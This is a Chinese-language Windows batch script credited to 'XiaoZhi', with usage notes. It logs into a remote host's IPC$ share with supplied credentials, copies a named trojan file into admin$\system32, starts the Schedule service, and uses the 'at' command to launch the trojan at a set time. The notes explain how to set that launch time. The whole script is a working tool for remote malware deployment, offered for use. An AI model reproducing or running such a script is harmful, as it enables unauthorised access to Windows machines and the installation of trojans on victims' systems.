index.bat代码如下
@echo off
:Rem
if {%1}=={} goto :Usage
:Rem
echo.
echo ------------------------------------------------------
echo.
echo 正在连接%1
echo.
net use \\%1\ipc$ "%3" /user:"%2"
echo.
echo 正在传送%4
echo.
copy %4 \\%1\admin$\system32
echo.
echo 正在启动Schedule
echo.
netsvc \\%1 Schedule /start
echo.
echo %1当前时间
echo.
net time \\%1
echo.
echo 设置启动%4的时间
echo.
pause
edit index.bat
at \\%1 11:11 %4
goto :BYE
:Usage
echo.
echo ------------------------------------------------------
echo.
echo 作者:XiaoZhi
echo 主页:http://dj886.y365.com/
echo.
echo index.bat IP 用户名 密码 木马文件名
echo.
echo ------------------------------------------------------
goto :exit
:BYE
echo.
echo ------------------------------------------------------
echo.
echo 成功完成所有命令
echo.
echo ------------------------------------------------------
echo.
:exit
注意netsvc.EXE要与INDEX.BAT在同一目录
得到远程主机时间的时候会停下来按任意一键继续
将11:11修改成启动木马的时间